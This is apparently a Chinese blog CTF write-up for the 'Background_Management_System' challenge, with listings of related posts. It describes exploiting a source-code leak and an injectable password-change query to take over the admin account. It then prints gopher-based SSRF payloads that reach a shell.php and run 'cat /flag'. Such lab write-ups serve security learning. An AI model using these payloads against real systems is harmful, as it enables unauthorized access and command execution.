攻防世界--Background_Management_System

最新推荐文章于 2023-12-29 17:01:53 发布
最新推荐文章于 2023-12-29 17:01:53 发布
阅读量1.4k 收藏 1
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122395198
版权

先看提示 

这里有一个登陆和一个注册,尝试注册admin显示已经存在,猜测SQL注入,发现这里有WAF无法绕过,先注册进去看看

提示只有admin才会给hints
 

扫下目录
 

www.zip源码泄漏,这里发现shell.php但是目前还无法利用

代码审阅
限制了
Login和Register都对可控参数做了转义,无法利用

Userinfo中没有限制,所以可以利用修改密码改实现越权

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

 修改密码后即可使用新密码登陆admin

这里使用gopher协议来进行ssrf

?url=gopher://127.0.0.1:80/_GET%20/xinan/public/shell.php

/_GET%20/ 表示用gopher协议向80端口发了一个GET请求

下面就是提供cmd参数?是特殊字符需要二次编码%253F,可能是协议的特性问题,别的%20 %2B都是一次编码

?url=gopher://127.0.0.1:80/_GET%20/xinan/public/shell.php%253Fcmd=cat%2B/flag

得到flag 

 参考文章:

https://xz.aliyun.com/t/2115
gopher 协议初探 - Konmu - 博客园

Uzero.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 web高手进阶区 10分题 Background_Management_System
闵行小鱼塘
10-21 1028
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Background_Management_System的writeup
攻防世界 WEB Background_Management_System
qq_41696858的博客
10-08 375
上一题smarty靶场好像有点问题,shell传上去连不上去,包括这一题好像也比原题少了些东西 先看看吧,这一题,老问题,注册,登录,发现没漏洞,扫目录,发现www.zip 源码审计,在application/index/controller/里面的UserInfo里面发现问题 $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' "; 前面注册登录页面都对转义字符做了过
【xctfBackground_Management_System】
qq_40646572的博客
10-22 323
这道题结合sql二次注入,ssrf漏洞,伪协议访问,以及最后的符号编码问题,总体来讲难度,中等。尤其是最后的编码问题,?需要二次url编码,空格被过滤,需要使用+进行连接,并且需要+进行编码。
Background-management-system-architecture:后台管理系统架构(react和vue)个人总结及基础代码
03-11
前言 最近做成一套后台管理系统,参考的是饿了么大神的 ,自己跟着撸一遍之后突然想比对一下react和vue在后台管理系统的方案以及架构,于是有了此项目。 参考 简介 本项目集合vue + vuex + vue-router + element-ui,react + react-router-dom + redux + antd-design(分别用比较火的两个脚手架create-react-app和Ant蚁金服的react轻量级框架dva)着重想介绍后台管理系统中的权限管理,网络请求,状态机,缓存,组件的写法,打包上线,优化以及在内置一个后台系统中可能会遇到的杂七杂八的问题,希望读者能够少走弯路。 (本文档将持续更新...) 注意 本项目的代码只是作为参考,真正想搭自定义的框架请使用脚手架一步步来,这样才会学得更多 vue部分 项目建造和必装的插件 使用的命令vue init webpac
XCTF-Background_Management_System
2201_75955146的博客
12-29 429
话不多说,开干这题主要考了二次注入和SSRF的内容,中间存在很多过滤,是一道中等难度的题,认真做的话对学习还是有很大用的。
MS11-046.rar_ms11_ms11-011_visual c
09-21
【标题】"MS11-046.rar_ms11_ms11-...综上所述,这个压缩包对于理解MS11-046漏洞、研究安全攻防策略以及提高软件开发的安全意识具有重要意义。通过深入学习和应用这些知识,可以提升系统的安全性,防止潜在的恶意攻击。
hyenae-0.36-1_fe_0.1-1-win32.exe
04-17
只是一款基于TCP/IP协议的一款网络IP嗅探·与试压测试软件,可以用于网站压力测试也可以用来网络攻防测试,检测网站的dos承受力。
攻防靶场」law-t08-emerging_security_management_and_legal_challeng
12-04
攻防靶场」law-t08-emerging_security_management_and_legal_challenges_for_executives - 风险评估 日志审计 技术分析安全测试 WEB应用防火墙 云安全
网络攻防课程seed-labs实验-Web_XSS_Elgg.zip
最新发布
06-01
【网络攻防课程seed-labs实验-Web_XSS_Elgg.zip】是一个针对网络安全学习的实验,主要关注Web应用程序中的跨站脚本(XSS)攻击。XSS是一种常见的网络攻击方式,攻击者通过在网页中注入恶意脚本,使用户在不知情的...
网络攻防课程seed-labs实验-Buffer_Overflow_Server.zip
06-01
《网络攻防课程:深入理解Buffer Overflow Server》 在网络安全领域,Buffer Overflow是经典且重要的攻击手段之一。这个实验——“Buffer Overflow Server”,是网络攻防课程中的一个关键环节,旨在帮助学生理解并...
react-background-management:一个用于后台管理的React应用程序
04-02
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误。 npm test 在交互式监视模式下启动测试运行器。 有关更多信息,请参见关于的部分。 npm run build 构建生产到应用程序build文件夹。 它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。 生成被最小化,并且文件名包括哈希值。 您的应用已准备好进行部署! 有关更多信息,请参见关于的部分。 npm run eject 注意:这是单向操作。 eject ,您将无法返回! 如果您对构建工具和配置选择不满意,则可以随时eject 。 此命令将从您的项目中删除单个生成依赖项。 相反,它将所有配置文件和传递依赖项(we
[ 网络安全] MBAK (网站备份文件爆破工具) v1.0.0 与 MSSRF (SSRF漏洞利用)工具 组合拳
04-09 372
MBAK (网站备份文件爆破工具) v1.0.0 与 MSSRF (SSRF漏洞利用)工具
攻防世界——web新手和引导模式(全解)
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界Web高级进阶第二题
Y4tacker的博客
07-21 8990
看题,看关键字 看到下面这个,我还以为又要构造参数了 结果一言难尽
攻防世界WEB进阶之bug
harry_c的博客
09-08 6358
攻防世界WEB进阶之bug1、描述2、实操3、答案 1、描述 难度系数: 2星 题目来源: RCTF-2015 题目描述:暂无 题目场景: 点击获取在线场景 题目附件: 暂无 首先打开场景发现是一个登录页面,而且有注册界面,而且还有修改密码的选项,首先注册号账号后查看是否登陆进去能找到漏洞,未果。 打开修改密码界面,尝试是否有逻辑漏洞,果然,将admin账号的密码成功修改为harry。 2、实操 ...
攻防世界——web高手进阶区题解
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
攻防世界-- web高手进阶区-- writeup汇总
yisosooo的博客
09-22 6309
随做随记,争取记录详细思路,以供后续反思。 第一题-- cat 按照提示输入loli.club,没有任何回显。输入baidu.com也没有任何回显。再次尝试输入127.0.0.1,出现: 可知,submit其实是ping命令,而且好像只对ip地址起作用。尝试运行系统命令: 失败。输入127.0.0.1 | ls 同样失败。但是发现URL编码可以传入。当输入到%80时,出现报错信息,...
[ 攻防世界 ] web进阶
Dannie01的博客
11-23 910
目的:练习做题手感和思路 CAT 搜索框搜索 弹出?url= 猜测是SSRF,所有协议均被过滤 http:// file:/// dict:// gopher:// 回归题目和描述,由CAT联想是命令执行,依然是 invalid url 思路切入点 invalid url => fuzz fuzz是我思路和实践弱项,积累 ?url=%88 宽字节,获取报错信息 html源码 复制粘贴本地查看 看到了熟悉的django报错页面,看来是将输入的参数传到了后端的django服务中进行解析,而d.
攻防世界】学习记录-web(系数1 part2)
龟速更新的九某人
08-13 4399
攻防世界】学习记录-web(系数1 part2) 0482 weak_auth 0485 simple_php 0712 baby_web 1004 inget 1005 easyupload 1007 fileinclude 1008 very_easy_sql 1010 fileclude
web python template injection_攻防世界-Web_python_template_injection详解
05-26
Web Python Template Injection 是一种常见的 Web 漏洞类型,通常缩写为 SSTI(Server Side Template Injection)。该漏洞是由于 Web 应用程序未正确处理用户输入导致的,攻击者可以通过构造恶意输入来执行任意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值